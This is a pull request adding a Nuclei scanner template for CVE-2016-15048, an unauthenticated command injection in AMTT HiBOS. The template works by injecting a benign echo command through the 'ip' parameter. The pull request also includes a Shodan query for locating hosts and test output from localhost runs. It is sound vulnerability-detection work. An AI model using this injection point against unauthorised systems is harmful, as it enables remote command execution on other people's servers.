### PR TITLE
feat: Add CVE-2016-15048 template 

### DIFF
--- a/http/cves/2016/CVE-2016-15048.yaml
+++ b/http/cves/2016/CVE-2016-15048.yaml
@@ -1,0 +1,44 @@
+id: CVE-2016-15048
+
+info:
+  name: AMTT Hotel Broadband Operation System (HiBOS) - Command Injection
+  author: pranjal-negi
+  severity: critical
+  description: |
+    AMTT Hotel Broadband Operation System (HiBOS) contains an unauthenticated command injection caused by improper validation of the ip parameter in /manager/radius/server_ping.php, letting remote attackers execute arbitrary system commands as the web server user, exploit requires no authentication.
+  impact: |
+    Successful exploitation of this vulnerability can lead to full system compromise as the web server user.
+  remediation: |
+    Apply the latest security patches provided by AMTT to fix the command injection vulnerability.
+  reference:
+    - https://wooyun.laolisafe.com/bug_detail.php?wybug_id=wooyun-2016-0181444
+    - https://nvd.nist.gov/vuln/detail/CVE-2016-15048
+    - https://vulncheck.com/vulnerabilities/cve-2016-15048
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2016-15048
+    cwe-id: CWE-78
+    epss-score: 0.96
+    epss-percentile: 0.99
+  metadata:
+    max-request: 1
+    shodan-query: http.title:"HiBOS"
+    verified: true
+  tags: cve,cve2016,rce,hibos,amtt,command-injection,kev
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/manager/radius/server_ping.php?ip=127.0.0.1;echo%20-n%20'CVE-2016-15048';echo%20'TEST'"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "CVE-2016-15048TEST"
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
### PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Added CVE-2016-15048 - AMTT Hotel Broadband Operation System (HiBOS) - Command Injection
- References:
  - https://wooyun.laolisafe.com/bug_detail.php?wybug_id=wooyun-2016-0181444
  - https://nvd.nist.gov/vuln/detail/CVE-2016-15048
  - https://vulncheck.com/vulnerabilities/cve-2016-15048

### Template validation

<!-- Clarifies if the valdation of the template was done on an actual system for which the template was developed -->
<!-- If this concerns a vulnerability check, please clarify if validation was done on a known vulnerable system and optionally on a known not vulnerable system to avoid false positives -->

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details (leave it blank if not applicable)

**Nuclei Debug Output (Vulnerable Environment):**
```bash
$ nuclei -t http/cves/2016/CVE-2016-15048.yaml -u http://localhost:8081 -debug

[INF] [CVE-2016-15048] Dumped HTTP request for http://localhost:8081/manager/radius/server_ping.php?ip=127.0.0.1;echo%20-n%20'CVE-2016-15048';echo%20'TEST'

GET /manager/radius/server_ping.php?ip=127.0.0.1;echo%20-n%20'CVE-2016-15048';echo%20'TEST' HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [CVE-2016-15048] Dumped HTTP response http://localhost:8081/manager/radius/server_ping.php?ip=127.0.0.1;echo%20-n%20'CVE-2016-15048';echo%20'TEST'

HTTP/1.1 200 OK
Connection: close
Content-Length: 30
Content-Type: text/html; charset=UTF-8
Date: Thu, 01 Jan 2026 08:00:45 GMT
Server: Apache/2.4.54 (Debian)
X-Powered-By: PHP/7.4.33

<pre>CVE-2016-15048TEST
</pre>
[CVE-2016-15048:word-1] [http] [critical] http://localhost:8081/manager/radius/server_ping.php?ip=127.0.0.1;echo%20-n%20'CVE-2016-15048';echo%20'TEST'
[CVE-2016-15048:status-2] [http] [critical] http://localhost:8081/manager/radius/server_ping.php?ip=127.0.0.1;echo%20-n%20'CVE-2016-15048';echo%20'TEST'
[INF] Scan completed. 2 matches found.
```

**Nuclei Debug Output (Patched Environment):**
```bash
$ nuclei -t http/cves/2016/CVE-2016-15048.yaml -u http://localhost:8082 -debug

[INF] [CVE-2016-15048] Dumped HTTP response http://localhost:8082/manager/radius/server_ping.php?ip=127.0.0.1;echo%20-n%20'CVE-2016-15048';echo%20'TEST'

HTTP/1.1 200 OK
...
Date: Thu, 01 Jan 2026 08:15:42 GMT
Server: Apache/2.4.54 (Debian)
X-Powered-By: PHP/7.4.33

Invalid IP or hostname format
[INF] Scan completed. No results found.
```

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)

fixes: #14655 
/claim  #14655
